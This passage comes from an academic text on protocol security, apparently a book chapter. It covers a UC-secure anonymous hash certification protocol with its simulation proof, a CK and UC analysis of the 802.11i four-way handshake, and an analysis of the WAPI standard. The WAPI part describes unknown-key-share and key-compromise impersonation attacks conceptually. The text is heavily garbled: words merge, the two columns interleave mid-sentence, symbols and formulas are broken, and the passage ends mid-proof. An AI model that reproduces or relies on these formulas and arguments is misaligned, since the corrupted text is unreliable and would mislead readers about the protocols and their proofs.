
signature key, v beaverificationkey.Wesaythat c is the encrypted real identity of the subscriber, Pi

an anonymous hashcertificationprotocol satisfies
is the owner identity of the credential, k is the secret
the security requirements if the following proper- information, that is, the hash pre-images, with its
ties hold: length is k2, h is the Merkle hash chain path of this
credential.Thevalueofthiscredentialisdefin
Completeness. For any valid credential (c, pi, as valH (ci ) = c ||H (k1 ) ||H (k2 ) 
||||H (kk 2 ) .
k, h), A counter t that is initialized to 0 and is used to
Prob[( s, v) ← gen(1k );0 ← Verify index credential ci that has been issued in period i.
Credential (c, z , k , p j , h, , v)] < (k ) , A set of credential C = È ci and a set of credential
where σ is the signature of root(h). to be used Tprepared are initialized to f.
Consistency. For any valid credential (c, pi, k, 1. Present Credential

h), the probability that
Upon receiving a message
VerifyCredential (c, z , k , p j , h, , v)
generates two different outputs in two independent ( Present Credential , pi , c, z , p j )
invocations is smaller than e(k). from some party pi, send
Unforgeability. For any PPT forger F, ( Present Credential , pi , c, z , p j )

to the adversary. Return the message from the
Prob[( s, v) ← gen(1k );(c, p j , k , h) ← F Cred
(v),1 ← adversary to pi.
VerifyCredential (c, z , k , p j , h, , v)] < (k )
and F never as the signature functionality FSIG to 2. VerifyCredential
sign root(h).
Upon receiving a message
The Construction of Anonymous Hash ~
(VerifyCredential , pi , c, z , k , p j , h ', , v)
Certification Ideal Functionality FCred
from some party pi,
~
The functionality is realized by using a signature
scheme SS = (Kg, Sig, V f), a symmetric encryp-
tion scheme, a pseudorandom functions R and send to the adversary. Return the message from
a collision-free, one-way hash functions H. we the adversary to pi.
assume that SS isCMAsecureforthesimplified
purpose. 3. Check Reuse
In the anonymous hash certification ideal
functionality, the entities are denoted as ASU for Upon reception of
~ ~
the authentication server, which is also denoted by (Check Reuse, ps , c, z , k1 , k2 , p j1 , p j 2 h, , v)
P0forthesimplifiedpurpose, and
P1, ..., Pm for the
subscribers or authenticator respectively. from some party ps, execute
~
Two security parameters, k1 and k2, are used
in this ideal functionality. The parameter k1 is the
key length of the symmetric cipher, and k2 is the
length of string used to identify the authenticator. for i =,2. 1
A special function  is used to map the identity of
authenticator to [k2] such that  (pj) has cardinality • If at least one execution returns,
k2/2, and ( pi ) ≠ ( p j ) for pi ≠ pj. (VerifyCredential , ps , c, p j , invalid )
The credential is denoted as ci = (c, pi, k, h), where i
then return

3. Signatureverification
(Verify Cre
dential , ps , c, p j , invalid )
i
to ps. Upon reception of (Verify , P, m, , ' ) from a veri-

fierV:
• If Pj1 = Pj2 then return, • Sends (Verify , P, m, , ' ) to S.
• A f t e r r e c e iv i n g t h e m e s s a g e
(Check Re use, ps , c, no) (Verify , P, m, , ' ) from S, works as
otherwise return follows.
(Check Reuse, ps , c, yes ) 1. If q'= q and there exists the record (m, , ,1) ,
to ps. (end) set f = 1.
2. If q'= q, P has not yet been corrupted by S,
construction of uc-secure and there exists no record such that (m, ' , ,1)
Anonymous Hash Certification for ∀σ', set f = 0.
Protocol 3. If q' ≠ q and there exists the record (m, , ' , f ' ) ,
set f = f '.
In this section, we present a simple protocol 4. Else, set f = f, then records (m, , ' , ) .
that realizes FCred given FSIG, with the aid of ide-
ally authenticated communication with a “trusted • Hands (Verified,P,m,f ) to V. (end)
anonymoushashcertificateauthority.”Thisset-up
assumption is formalized as an ideal functional- Thentheanonymoushashcertificateauthorit
ity FHCA . Functionality FHCA is presented as follows.
Firstlywemodifythedefinition of
FSIG (Canetti,
2004; Michael & Dennis, 2004) as follows. 1. Key generation
Upon reception of the message (GenerateKey)
1. Key generation from ASU, send (KeyGen, ASU) to the adver-
sary S, upon receiving (Verification Key, ASU,
Upon reception of (KeyGen, P) from P: encryption key, k) from S, records (ASU, v, k)
and return (Verification Key, ASU, v).
• Sends (KeyGen, P) to the adversary S. 2. Identity Encryption
• After receiving the message (Verifica - Upon reception of the message (Identity encryp-
tionKey, P, q) from S, records (P, q) and tion, pi) from pi, proceed as follows:
sends (VerificationKey, q)P,to P. 1. Verify that pi is in the member list. If
not, return (Not A Member, pi) and quit.
2. Signature generation 2. Else, send (Identity encryption, pi) to the
adversary S, receive the encryption
Upon reception of (Sign, P, m) from P: identity c of pi, return (Encrypted identity,
pi, c).
• Sends (Sign, P, m) to S. 3. Credential generation
• After receiving the message Upon reception of the message (Credential
(Signature, P, m, σ) from S, looks for generation, pi, (c, pi, k, z)) from pi, send this
the record (m, , , 0 ). If it is found, sends message to the adversary, and wait for an OK
an error message to P and halts. Else, sends from the adversary. Then, Store credential e =
( Signature, P, m, ) to P and then records (c, pi, k, f) into set Ct, return (S, New Credential,
(m, , , 0 ). pi) and (pi, New Credential, c, z) to S.

4. Build tree (Identity encryption, pi) to FHCA. Upon re-

Upon reception of the message (Build tree, ASU) ceiving the message (Encrypted identity,
from ASU, set T ← buildtreeH (valH (Ct )) and pi, c) from FHCA , it calculates secret infor-
modify each credential e = (c, pi, k, f) of Ct into mation k j ← ( R i (c ||j )) kj2=1 , z ← H (k ) ,
(c, pi, k, getchainT (valH (e))), and send (Sign, ASU, sent (Credential generation, pi, (c, pi, k, z))
root(T)) to the adversary S. Upon receiving the to FHCA. ~
message (Signature, ASU, root(T), σ) from S, 3. E l s e p i s e t s k ← k ( Pj ) a n d~ o u t-
verify that no entry (root(T), σ, ) is recorded, p u t s ( Present Credential , c, k ) , i f
if it is, then output an error message to S and kl ← ( R i (c ||l ))lk=21 and z = H(k).
halt, else record the entry (root(T), σ, ), return 4. Otherwise, it outputs the message (Reject
(Build Tree, ASU, T, σ) to S, and set t ←t+1. Present Credential, c) and quits.
5. Add prepared credential 2. VerifyCredentia l
Upon reception of the message (Add prepared 1. p i v e~r i f i e s t h e v a l i d i t y o f
credential, pi, (c, pj)) from pi , send this message (c, z , k , p j , h, , v)
to the adversary, and wait for an OK from the 2. Pi sends (Verify pi, root(h), σ, v) to FSIG and
adversary. Then, add (c, pj) in the set Tprepared thenexecutesthesignatureverificatio
and return OK. process of FSIG.
6. Check prepared credential 3. Pi sends (Check prepared credential, pi, (c,
Upon reception of the message (Check prepared pj, pi)) to FHCA, and wait for an OK from
credential, pi, (c, pj)) from pi, send this message FHCA. ~
to the adversary, and wait for an OK from the 4. Pi verifies isvalidH(h)=1 and H (k ) = z ( Pj ) .
adversary.Then,find (c, pj) in the set Tprepared , 5. If FSIG returns 0 or any condition or is
return OK if this entry exists. notsatisfied,it(Verify returns
Credential,
7. Check exist of credential pi, c, pj, invalid) and quits.
Upon reception of the message (Check exist 6. else Pi returns (Verify Credential, pi, c, pj,
of credential, pi, (c, pj, k, h)) from pi, send this valid).
message to the adversary, and wait for an OK 3. Check Reuse
fromtheadversary.Then, (c, find
pj, k, h) in 1. Pi checks the reuse of
the set C, return OK if this entry exists. ~ ~
8. Reveal ID (c, z , k1 , k2 , h, , p j1 , p j2 ) ,
Upon reception of the message (Reveal ID, ASU, 2. It executes
c) fromASU,findacredential (c, p, ., .) in set ~
C. If no such entry exists, then send (Reveal ID,

(VerifyCredential , c, z , ki , h, , p ji )
ASU, c) to the adversary S. Once the message for i=,2. 1
(c, p) is received from S, returning(Reveal ID, 3. If at least one execution returns (Verify
ASU, c, p). Credential, c, pji, invalid), then pi returns
(Check Reuse, c, invalid) and quits.
Finally, we present a protocol pCred that realizes 4. If pj = pj then pi returns (Check Reuse, c,
FCred in the (FSIG, FHCA)-hybrid model in a straight- no), otherwise it returns (Check Reuse,
forward way as follows. c, yes).
1. Present Credential Proof of pCred securely realizes FCred in

1. pi receives a message (Present Creden- the (fsIg, fHcA)-Hybrid Model
tial, c, z, pj),
2. If pi has not owned a credential, it cre- Theorem 5. Protocol pCred securely realizes FCred
ates a symmetric key R i ←
R
R k1 with in the (FSIG, FHCA)-hybrid model.
a pseudorandom function and sends
0
Figure 2. The construction of an adversary S
S
Z’
～ P1 ～
P0 P0 P1
S
A
FCr ed
Proof. Let A be an adversary that interacts Simulating Present Credential

with entities running pCred in the (FSIG, FHCA)-hybrid When S receives in the ideal process FCred a mes-
model. We construct an ideal-process adversary sage (Present Credential, pi, c, z, pj), it proceeds as
S such that the view of any environment Z of an follows:
interaction with A and pCred is distributed identi-
cally to its view of an interaction with S in the 1. If pi has not owned a credential, then
ideal process for FCred. simulate for A the process of credential
generation. That is, send to A (in the name
1. The construction of adversary S of FHCA) the message (Identity encryption, pi),
obtain the response from A, then it set
The adversary S runs an internal copy of envi- a random number u i as the key of Pi, i.e.,
ronment Z, adversary A and each of the involved ui ← R
{0,1}k1 , record (Pi, ui) in the mem-
parties pi. All messages from Z to A are written to ber list and then calculates secret infor-
A’s input tape. In addition, S does the following: mation k j ← (U i (c ||j )) kj2=1 , z ← H (k )
For each player pi that the real-world adversary A , where k = (k, k, ..., kk ), and send to A
corrupts, the ideal adversary S corrupts the cor- the message (Credential generation, pi, (c,
responding dummy player pi. When a corrupted pi , k, z)) from FHCA .
dummy player pi receives a message m from Z, the 2. Simulate for A the process of present cre-
adversary S lets Z' send m to pi. When a corrupted dential. That is, set m ← R
{0,1}k2 , make
pi outputs a message m to Z', then S instructs the sure the number of “1” is exactly k2/2 and
corrupted pi to output m to Z. This corresponds topi m never been produced before,~ construct
being linked directly to Z. The construction of the the challenge information k ← km by
adversary S is shown in Figure 2. providing the pre-images of secret in-
formation k that corresponding to the bit
2. The operations of adversary S “1” of m, send the message (Add prepared
credential, pi, (c, pj)) to A from FHCA , and
~
send ( Present Credential , p , c, k )
i
to FCred.

SimulatingVerifyCredential If A corrupts
~
a patty pi, then S corrupts the
1. If a message ~ same party Pi in the ideal process
~
and hands A the
(VerifyCredential , pi , c, z , k , p j , h ', , v) internal data of that party Pi.
arrives from FCred, it proceed as follows.
2. Send the message As for the other operations, like Check Reuse,
(Check exist of credential , pi ,(c, pi , k , h)) becausetheirdefinitionsareidenticalinthei
to A from FHCA. If the message from FHCA is functionality and real protocol, it is no use for them
not OK, send to be simulated for A.
(VerifyCredential , pi , c, p j , invalid ) t o As the simulation is perfect and the proof is
FCred and quit. direct, the proof procedure can be referred to Fan,
3. Else check the path, if h ' ≠ h, then send JianFeng, & Moon, 2007).
(VerifyCredential , pi , c, p j , invalid )
to FCred and quit.
4. El s e , ve r i f y t h e sig n a t u r e , s e n d tHE sEcurIty AnAlysIs of
(Verifypi , root (h), , v) to A (i n t he four-wAy HAndsHAkE In 802.11I
name of)FSIG, upon receiving the message wItH tHE ck ModEl And uc
(Verifiedpi , root (h), ) from A, ModEl
(1) If the entity (root (h), ,1) is recorded, set
WLANcanprovidegreatexibility fl fortheusers.
f = 1.
However, security is always a serious concern
(2) Else, if the signer is not corrupted, and
because of the openness of wireless medium for
no entry (root (h), ' ,1) for any 'is re-
public access within a certain range. To solve the
corded, then set f = 0 and record the entry
security problems of WLAN, the IEEE 802.11 has
(root (h), ,0).
designed a new security standard, which is called
(3) Else, if there is an entry (root (h), , f ' )
IEEE 802.11i (IEEE P802.11i D3.0, 2002). In this
recorded , then let f = f .
'
standard, a concept of robust security network
(4) Else, let f = 0 and record the entry
(root (h), , ). has been proposed. In addition, an authentica-
tion mechanism based on EAP/802.1X/RADIUS
If f = 0, send
(Aboba & Simon, 1999; 802.1X-2001, 2001;
(VerifyCredential , pi , c, p j , invalid )
Rigney, Willens, Rubens, & Simpson, 2000) has
toFCred and quit.
been developed to replace the poor open system
authentication and shared-key authentication in
5. Else, verify the validity of the creden-
WEP (Borisov, Goldberg, & Wagner, 2001). As
tial,
a long-term solution to secure wireless links, the
(1) If pi is not corrupted,
latestIEEEstandardi 1 2.08 hasbeenratifiedon
(a) Send message
June 24, 2004.
(Check prepared credential , pi ,(c, p j ))
The four-way handshake (in short, 4WHS) pro-
to A from FHCA.
tocol in 802.11i plays a very important role in the
(b)If ~ the FHCA message fromis not OK
authentication and key-agreement process. Some
or k ≠ km, send to FCred the message
works have been done on its security analysis. In
(VerifyCredential , pi , c, p j , invalid ) and
Changhua and Mitchell (2004) the authors analyzed
quit. ~
the four-way handshake protocol using a finite-
(2) Else if H (k ) ≠ zm, send (VerifyCredential,
stateverificationtoolandfindaDoSattack.The
Pi, C, Pj, invalid) to FCred and quit.
attack involves forging initial messages from the
O t h e r w i s e r e t u r n
authenticator to the supplicant to produce incon-
(VerifyCredential , pi , c, p j , valid ) to FCred . sistent keys in peers. However the repair proposed
by the authors involves only a minor change in the
Simulating party corruptions

algorithm used by the supplicant and not involves SPA}||Max{AA,SPA}||Min{ANonce,SNonce}

the protocol itself. || Max{ANonce, SNonce}), and divided into Key
In this section, we give a formal analysis of the Confirmation Key (KCK), Key Encryption Key
four-way handshake. The results show that four- (KEK), and Temporary Key (TK). Note that the
way handshake protocol is secure not only in the MIC is actually calculated with KCK, which is
CK model, but also in the UC security model. So only part of PTK.
it can be securely used as the basic model of the
authentication and key agreement of WLAN. the security Analysis of four-way
Handshake Protocol
the four-way Handshake Protocol in
802.11i According to the thought of CK model, we extract
the protocols 4WHSAM in AM and the authentica-
In 802.11i, once a shared pairwise master key torprf9 . We can further analyze that whether the
(PMK) is agreed upon between the authenticator protocol 4WHSAMisSK-secureintheAM 9 . or
prf
and the supplicant, the authenticator may begin a the protocolis an effective MT-authenticator or not,
four-way handshake by itself or upon request from thus we can draw the conclusion that whether four-
the supplicant. The message exchange is shown, at wayhandshakeprotocolcansatisfythedefinition
an abstract level, in Figure 3. S represents the Sup- of SK-security in the UM or not.
plicant and A represents the Authenticator; SPA and
AA, SNonce and ANonce, represent the message Protocol 4wHsAM
authentication code (MAC) address and nonces of
the supplicant and authenticator, respectively; sn is This protocol is described as follows:
the sequence number; msg1, 2, 3, 4 are indicators 1. Both players pre-share a key kij.
of different message types; MICPTK{} represents 2. The initiator pi, on input (pi, pj, s), chooses
the message integrity code (MIC) calculated for the ri ←R
 {0,1}kand sends (pi, s, ri) to pj;
contents inside the bracket with the fresh pairwise
transient key (PTK). While MAC is commonly 3. Upon receipt of (pi, s, ri), the responder pj
used in cryptography to refer to a MAC, the term  {0,1} , where rj ≠ ri, and sends
k
chooses rj ← R
MIC is used instead in connection with 802.11i (pj, s, rj, tj) to pi. Then pj outputs session key
because MAC has another standard meaning, prf kij (ri, rj).
medium access control, in networking.
The fresh PTK is derived from the shared 4. Upon receipt of (pj,s, rj) player pj outputs
PMK through a pseudo random function with session key prf kij (ri, rj).
output length X ( PRF-X), say, PTK = PRF-
X(PMK, “Pairwise key expansion” || Min{AA,
Figure 3. The idealized 4-way handshake protocol

The Security Analysis of Protocol of 4WHSAM on behalf of that party. When a

4WHSAM party is corrupted or a session (other than
the m-th session) is exposed, hands A all the
Theorem 6. If the pseudorandom function f is se- information corresponding to that party or
cure against chosen message attacks, the protocol session as in a real interaction.
4WHS AM is SK-secure without PFS in the AM. 4. When the m-th session, say (pi, pj, sm), is
invoked within pi, let pi send the message (pi,
Proof. The protocol 4WHSAM is based on a pre- sm, r) to pj.
shared key, from which the session key kij is gener- 5. When pj is invoked to receive (pi, sm, r), let
ated, thus it cannot provide the security attribute p j
send the message (pj, sm, t) to pi.
of perfect forward security (PFS). According to 6. If session (pi, pj, sm) is chosen by A as the
the model mentioned previously, let the session test–session, then provide A with 3 as the
never expire. answer to this query.
7. If the m-th session (pi, pj, sm) is ever exposed,
ToseethatthefirstrequirementofDefinition or if a session different than the m-th session
SK-securityissatisfied,accordingtothedefinition is chosen as the test–session, or if A halts
of AM, note that if both pi and pj are uncorrupted without choosing a test-session then D outputs
during the exchange of the key and both complete b'← R
 {0,1} and halts.
the protocol, then they both get the uncorrupted ri 8. If A halts and outputs a bit b', then D halts
and rj, thus establish the same key, which is prf kij and outputs b' too.
So the protocol 4WHSAMsatisfiesthepropertyof 1
DefinitionSK-security. The run of A by D (up to the point where A
Then we prove that the second property of stops or D aborts A’s run) is identical to a normal
DefinitionSK-securityisalsosatisfiedby protocol
run of A against protocol 4WHSAM.
4WHSAM. Assume there is a KE-adversary A in Consider thefirstcaseinwhichthem-thsession
the AM against protocol 4WHSAM that has a non- is chosen by A to be tested and A get the response
negligible advantage L in guessing correctly b. We of γ. Thus, if the input to D came from, Q0 then
can construct an algorithm D that distinguishes the response was the actual value of the key. On
pseudorandom and random function with non- the other hand, if the input to D came from,Q1
negligible probability L . then the response to the test query was a random
Let Q0={r,t,prf k(r,t)}, and Q1=.{r,t,random ( )} value. AS mentioned above, the input to D was
The input to D is denoted by {r,t,3} and is 1 chosen with probability 1/2 from Q0 and Q1. Then
chosen from Q0 or Q1 each with probability . Let the distribution of responses provided by D to the
2 test queryofAisthesameasspecified - byDefini
L be an upper bound on the number of sessions
invoked by A in any interaction. Algorithm D uses tion SK-security. In this case, the probability that
adversary A as a subroutine and is described as A guesses correctly whether the test value was
follows. “real” or “random” is 1/2+L for a non-negligible
value L . This is equivalent to guessing whether
1. Choose m ←  .{1,...,l}
R the input to the distinguisher D came from Q0 or,
2. Invoke A, on a simulated interaction in the Q1 respectively. Thus, by outputting the same bit
AM with parties p1,...,pn running 4WHSAM. b' as A, we get that the distinguisher D guesses
Each of the parties shares prf kij ( )with the
correctly the input distribution Q0 or Q1 with the
other one, except for those two in the m-th same probability 1/2+L as A did.
session, who share prf k ( ). Now consider the second case in which (pi, pj, sm)
3. Whenever A activates a party to establish a is not chosen by A. In this case, D always halts and
new session (except for the m-th session) or to outputs a random bit, thus its probability to guess
receive a message, D follows the instructions correctly the input distribution Q0 or Q1 is 1/2.

Since the first case happens with probability Proof. To prove the ACK property for 4WHS
1
, we construct the following internal state simula-
L
tor I. Recall that before 4WHS actually generates
while the second case happens with probability output, the local state of the pi infirst
the party (
1- 1 , aforementioned description) consists of (k1, k2,s,
L
pi, pj). The internal state of the other party (pj in
the overall probability of D to guess correctly is the aforementioned description) is identical (its
1
internal state, like k0, has been erased). The output
1
PR=+L).50 ( + + 0.5 × (1- )=+.50 L of I, given (k1, s, pi, pj) will be l pi=l pj=(k1, rI, s,pi,
L L
pj), where rI is a random value of the same length
Thus D succeeds in distinguishingfromwith as k2. (Consequently, when the internal states of
non-negligible advantage, which is confl ict
pi and toreplaced with l pi and lpj respectively,
pj are
the Assumption that the pseudorandom function the added protocol message will be computed and
is secure. So the protocol 4WHSAM satisfies the verifiedMAC as RI (s, ri) rather than MACK 2 (s,
property2ofDefinitionSK-security. ri). Next we proof that I is a good internal state
Thus the protocol 4WHSAM is SK-secure without simulator.
PFS in the AM. # Le F be an ideal functionality which can se-
curely realize key exchange and A be an adversary.
Authenticator 9 prf If I is not a good internal state simulator, then
the environment Z can distinguish between an
Theorem 7. Assume that the pseudorandom func- interaction with A and 4WHS and an interaction
tion and MAC in use are secure against chosen with A and the above transformed protocol(replace
message attacks. Then protocol prf
emulates9 the internal states of pi and pj with the outputs of
protocol MT in unauthenticated networks. (Fan I) with a non-negligible advantage . The only
et al., 2007). difference between the protocol resultant from
the aforementioned transformation and 4WHS is
the security Analysis of four-way the replacement of k2 with rI. So if I is not a good
Handshake Protocol in the uM internal state simulator, then Z can distinguish
between rI and k2 with a non-negligible advantage.
We have proved that the protocol 4WHSAM is SK- If the adversary can distinguish between k2and a
Secure without PFS in the AM, and the protocol random value with a non-negligible advantage,
9 prf is a MT-Authenticator, thus we get the result where k2=sec ond n2(k0), then he/she can distinguish
of security analysis of 4WHS in the UM. between k0 and a random value with a non-negli-
Theorem 8. If the pseudorandom function and gible advantage. As we have proved that 4WHS is
MAC function in use are secure against chosen SK-secure, thus the adversary cannot distinguish
message attacks, protocol four-way handshake is between k1 (k1= firstn1 (k0) ) and a random value
SK-Secure in the UM. with a non-negligible advantage, well then he/she
cannot distinguish between k0 and a random value
with a non-negligible advantage, which reaches a
the four-way Handshake Protocol is
contradiction. So the environment Z cannot distin-
uc-secure
guish between an interaction with (A, 4WHS) and
(A, the transformed protocol) with a non-negligible
We have proved that 4WHS is SK-secure. Accord-
advantage, thus we have
ing to Definition ,6 now we prove that it hasFthe
HYB ,A,Z ≈ HYB F ,A,Z,I and I is a good internal
ACKproperty,thusalsosatisfiesthedefinition of
statesimulatorforWHS. 4 AccordingtoDefinition
UC-secure.
6 and theorem 1, we know that 4WHS has the ACK
Theorem 9. The protocol 4WHS has the ACK
property and is UC-secure. #
property.

According to Theorems 8, 9, and 1, we get security is undoubtedly the focus. But as far as
Theorem 10. we know, up to now, there are no articles that
systemically analyze the security of WAPI and
• Theorem 10: If the pseudorandom func- its implementation plan, which is imperfect for a
tion and MAC function in use are secure national standard. This contribution discusses the
against chosen message attacks, proto- security of WAPI and its implementation plan with
col four-way handshake is UC-Secure. the CK model. It has three contributions: (1) the
# security weaknesses of WAI in WAPI are given;
(2) the WAI module in the implementation plan
is proved secure in the CK model; and (3) how
tHE sEcurIty AnAlysIs of the implementation plan overcomes the security
cHInEsE wlAn sEcurIty weaknesses of the original WAPI is pointed out.
stAndArd wAPI wItH tHE ck The analysis results can help us understand the
necessity of the implementation plan and enhance
ModEl
the confidence of it. At the same time, as a case
study, their analysis is helpful for the design of a
The Chinese WLAN standard WAPI (GB 15629.11-
secure key-agreement protocol.
2003) (National Standard of the People’s Republic
ofChina,the, ) 302 firstissuedChinesestandardin
thefieldofWLAN,hasbeenformallyimplemented wAIs in wAPI and its Implementation
since November 1, 2003. WAPI is composed of two Plan
parts: WAI and wireless privacy infrastructure
(WPI). They realize the identity authentication and WAI adopts port-based authentication architecture
data encryption, respectively. In March of 2004, that is identical with IEEE 802.1X. The whole sys-
China IT Standardization Technical Committee tem is composed of mobile guest STA, access point
drafted out a new version, WAPI implementation (AP), and authentication service unit (ASU).
plan (National Standard of the People’s Republic of
China, 2004), which improves the original standard WAI in WAPI
WAPI. Compared with the original standard, the
greatest change the implementation plan made lies The interaction procedure of WAI in the original
in the WAI module. national standard WAPI is shown in Figure 4.
As a national standard which is about to be Fromthisfigure,wecanseethatWAIiscomposed
deployed and implemented on a large scale, its of two parts: certificate authentication and k
agreement.
Figure 4. WAI in WAPI

STA AP A SU
Certificate Authentication
A uthentication A ctivation
A ccess A uthentication Request

Certificate A uthentication R equest
Certificate A uthentication Response
A ccess A uthentication Response
K ey A greem ent Request

Key Agreement
K ey A greem ent Response

1. Certificate authentication. In this process, 1. In the implementation plan, the key agreement
stationSTA) ( sendsitspublickeycertificate request has to be initiated by AP. At the same
and access request time to the access point time, the secure parameter index SPI, AP’s
(AP) in the access authentication request. signature on the encrypted random value and
AP sends its certificate, STA’s certificate, SPI are included in this request. The signature
STA’s access request time, and its signature algorithm is ECDSA.
on them to authentication service unit (ASU) 2. In the key agreement response, SPI and the
in certificate authentication request. STA’s MACAfteron encrypted random and SPI
ASU validates AP’s signature and the two are included. The MAC is computed through
certificates,itsendsthecertificates validation
HMAC-SHA256 algorithm.
result, STA’s access request time, and ASU’s 3. The keys derivation method is different. STA
signature on them to STA and AP. andAPfirstcalculatethe ⊕r2, key
k= rhost
11
2. Key agreement. then extend k with KD-HMAC-SHA256
algorithm to get the session key kd, the
Figure5.ThekeyagreementintheWAIofWAPI authentication key ka and integration check
key.
the security weaknesses of wAI in

wAPI
The WAI module in the original WAPI has several

security weaknesses as follows:
1. Its key-agreement protocol cannot resist

the unknown key-share (UKS) attack
First, STA and AP negotiate the cryptography (Burton & Kaliski, 2001).
algorithms. Then, they respectively generate one
random value r1 and r2. These random values are We assume that an attacker Egetsacertificate
encrypted with the peer’s public key and sent to where his/her public key PKE is same as PKSTA. (In
each other. Both parties decrypt the encrypted many practical settings, the certificate autho
random values and derive the session key K= r1⊕r2. [CA] does not require a proof-of-possession of the
The key agreement process is shown in Figure.5, corresponding private key from a registrant of a
where ENC( )is the encryption function, PK AP and public key (Krawczyk, 2005), so an attacker E
PKSTA are AP and STA’s public key respectively. cangetacertificatefromtheCAinwhichhis/ her
public key is same as STA’s.) In addition, in the
WAI in the Implementation Plan certificateauthenticationprocess,ASUjustver
theauthenticityandvalidityofEacertificate,s
In the framework, WAI in the implementation alsocanpassthecertificationauthentication
plan is the same as that of the original WAPI, and he/she can launch the unknown-key share attack
it is also composed of certificate authentication in the key agreement. When STA sends the first
and key agreement. Compared with the original message ENC(PK AP, r1), E forwards this message
standard WAPI, the implementation plan remains to AP and claims that this message is from E. Then
unchanged in the certificate authentication, AP replies with but
ENC(PK E, r2). E forwards this
makes rather big improvement in the key agree- message to STA. When the protocol completes,
ment. The new key-agreement protocol is shown STA thinks that he/she agreed upon a key with AP,
in Figure.6. It is different from the original one in while AP thinks that he/she negotiated a key with
the following points: E. And these two keys are same. So, the attacker
E succeeds in the UKS attack.

Figure6.Thekey-agreementprotocolinWAIoftheimplementationplan
SPI=the MAC of the STA||the BSSID of the AP||the time of authentication request
Let us analyze this attack in the CK model. In to get r2 . Then he/she can get the session key of
the previous attack, the KE-adversary chooses the test session: k= r1 ⊕ r2. Thus the attacker can
the session in STA as the test session and expose impersonateAPtoSTA.AccordingtoDefinition
the session in AP (because these two sessions are 2, this protocol is not SK-secure.
not matching sessions, the session in AP can be
exposed). Because STA and AP get a same session 3. It does not realize the explicit identity
key, the KE-adversary can completely get the ses- authentication of STA and perhaps lead
sionkeyofthetestsession.AccordingtoDefinition to the faulty charge.
this
2, protocolisnotSK-secure.AndDiffieetal.
(1992) can be referred to for the consequences of From the WAI process, we can see that it does
this attack. not realize the explicit identity authentication of
STA to AP. An attacker can pass the certificate
2. Its key agreement protocol cannot resist authentication and access the networks only if
key-compromise impersonation (KCI) he/she gets a legal user’s certificate, which will
attack. lead to the faulty charge if the networks charge
the fee according to the access time.
Let us analyze this attack in the CK model.
First, we assume that STA’s private key is com- the security Analysis of wAI in the
promised and the attacker chooses the session in Implementation Plan
STA as the test session after STA complete the
matchingsessionswithAP.Theattacker cancertificate
Inthe first authentication, - APmakessigna
corrupt another mobile guest STA’ and imperson- tureinthecertificateauthenticationreque
ates him/her to send message ENC(PK AP, r1) to ASUmakessignatureinthecertificateauthentic
AP. We denote the session between STA’ and AP tion response. Both these signatures include STA’s
as SID’. When AP receives this message from access request time which ensures the freshness
STA’, he/she chooses another random value r3 of the signatures. Therefore ASU can authenticate
and responds with ENC(PKSTA’, r3). AP computes AP’s identity and STA can authenticate ASU’s
its session key of SID’ k’= r 1 ⊕ r3. The attacker identity. In addition, STA trusts ASU. So STA can
can expose this session and get k’ (this session is authenticatetheidentityofAPafterthecerti
not the matching session of the test session). In authentication. At the same time, AP authenticates
addition, the attacker can decrypt ENC(PKSTA’, r3) thecertificateprovidedbySTA.
to get r3. Thus he/she can get r1= k’ ⊕ r3. In addi- The key-agreement protocol in WAI of imple-
tion, the attacker can also decrypt ENC(PKSTA, r2) mentationplanisdenotedby.Inthefollowing,

we will prove that is SK-secure without PFS

the value encrypted by G in phase 0. If b=1then
(Güther, 1990). That is, the protocol is SK-secure,
G responds with a random string s* of the same
but does not provide perfect forward secrecy of the
length as HMAC-SHA256k '' (t * ).
sessionkeys.InordertoprovethatisSK-secure, a
Phase 3: Same as Phase 1.
wedefinea“game”asfollows.
Phase 4: B outputs a bit b’ as the guess of b.
And the winner is…B if and only if b=b’.
The Design of an Encryption Game The following notes are made about the
game:
Let (G, ENC, DEC) be a key-generation, encryp-
tion and decryption algorithm, respectively, of a
1. The challenging ciphertext c* in the phase 0
public-key encryption scheme that is secure against
is also the ciphertext sent by AP in the key
CCA2 attack (Wenbo, 2004). Let K be the security
agreementrequestof.
parameter. STA and AP have invoked G(K) to get
2. In Phase 1, B randomly chooses a test cipher-
their public and private key pairs.
text c, random value r and string t, and sends
This game integrates the CCA2-security of
them to G for process. It should be noticed
ENC with the key-agreement protocol (Canetti &
that B cannot simultaneously chooses c* and
Krawczyk, 2001; Wenbo, 2004). We will proceed to
t* as the input of G .
show that if an attacker can break the SK-security
3. B keeps r unchanged in every triple in order
of p , then he/she can win the game, that is, he/she
toreducethedifficultyoftheattack.
can break the CCA2-security of ENC.
The two participants in the game are G and B
Security Analysis of Key-Agreement
(for good and bad). G is the party against which
B plays the game. G acts as a decryption oracle. G Protocol in WAI
possesses a pair of public and private keys, PKSTA
and SKSTA (generated via the key generation algo- According to Definition 2, in order to prove that
rithm G). B is the attacker of protocolis , he/SK-she
secure,wehavetoarguethatitcanmeet
knows PKSTA but not SKSTA. He/she leverages the two requirements. The first one is that STA and
abilitieshe/shegetsintheattackof APto can get a same
take part session key after they complete
in this game. The game process is shown in the matching sessions. The second one is that B can-
following: not distinguish the session key kd from a random
value with a non-negligible advantage. In the fol-
Phase 0: G provides B with a challenge cipher- lowing, we will prove that can meet these two
*
text c =ENC(PKSTA,r1) for r1← K requirements.
R
 {0,1} .
Phase 1: B sends a triple (c, r, t) to G who Lemma 1. If the encryption scheme ENC is
responds with HMAC- SHA256ka (t). secure against the CCA2 attack, then at the end
( k a = l a s t ( K D - H M AC - S H A 2 5 6 ( k ' )) ,
' of protocol , STA and AP will complete matching
k ' = r ⊕ r ', r ' = DEC ( SK STA , c). The last( ) is a sessions and get a same session key.
function that extract out the last 16 bytes from a Proof. Since the signature algorithm ECDSA
bit string.) This is repeated a polynomial number of is secure against existential forgery by adaptive
times with each triple being chosen adaptively by B chosen-message attack (Brown, 2001), in addition,
(i.e., after seeing G ’s response to previous triple), SPI in the key agreement request can guarantee the
but he/she keeps r unchanged in every triple. freshness of this message and bind this message
Phase 2: B sends a test string t* =(SPI|| PK AP (r)) with the two communication parties, the attacker
to G . Then G chooses a random bit cannot forge or modify the request message.
b← R
 {0,1}. If b=0 then G responds with In addition, the attacker B cannot forge a key
HMAC-SHA256k '' (t )where ka = last
* '' agreement acknowledgment message. Let us prove
(KD-HMAC-SHA256( k '' ) , k '' = r ⊕ r, r is
a this with the reduction to absurdity. It is assumed
1 1

that the attacker can forge an acknowledgment a random value with a non-negligible advantage.
message with a non-negligible probability dur- Based on this ability, B also can distinguish k '' =
ing the run of the protocol . That is, he/she r1 ⊕ rcan
from a random value with a non-negligible
